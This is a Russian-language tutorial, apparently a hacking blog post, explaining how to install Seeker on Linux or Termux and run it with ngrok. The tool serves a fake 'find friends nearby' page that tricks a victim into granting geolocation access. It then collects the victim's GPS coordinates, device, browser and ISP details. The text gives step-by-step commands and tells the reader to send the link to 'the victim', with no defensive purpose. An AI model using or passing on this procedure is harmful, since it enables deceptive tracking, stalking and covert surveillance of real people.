Привет, друзья! Задумывались когда-нибудь, как хакеры могут узнать точное местоположение человека? Сегодня научимся это делать с помощью небольшого инструмента Seeker.
Seeker – это утилита, которая устанавливает сайт на сервер Apache и, используя Ngrok, создаёт ссылку при переходе по которой будет запрошен доступ к геолокации, в случае если такой доступ предоставлен, нам передаются данные устройства к которому получен доступ и координаты этого устройства, дополнительно сразу же формируется ссылка на Google Maps, с отметкой о местонахождении устройства.
Установка:
Linux:
pkg install git
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh
Termux
Устанавливаем ngrok:
apt update && apt upgrade
pkg install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
Устанавливаем seeker:
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh
После установки запускаем Seeker следующей командой:
python3 seeker.py -t manual
Затем выбираем цифру 0 (NearYou).
В новой сессии терминала запускаем ngrok через команду ngrok http 8080. После этого копируем полученную ссылку из строки Forwarding и добавляем в конец /nearyou, чтобы получилось https://5312c600d8a8.ngrok.io/nearyou (у вас ссылка будет другая)
Затем скидываем ссылку нашей жертве. Когда жертва перейдёт по ссылке, она увидит сайт с предложением поискать друзей вокруг:
Жертва принимает предложение и видит:
Сайт запрашивает разрешение на доступ к геолокации и как только такой доступ будет получен, Seeker покажет подробные данные об устройстве жертвы, и его местоположении.
Мы увидим: данные операционной системы, версию браузера, страну, регион, город и название провайдера, а также долготу, широту, точность определения места, высоту над уровнем моря, а также ссылку на Google Maps, чтобы наглядно увидеть местоположение определенных координат. Мою локацию определил довольно точно, да и в целом точность GPS - 10-15 метров.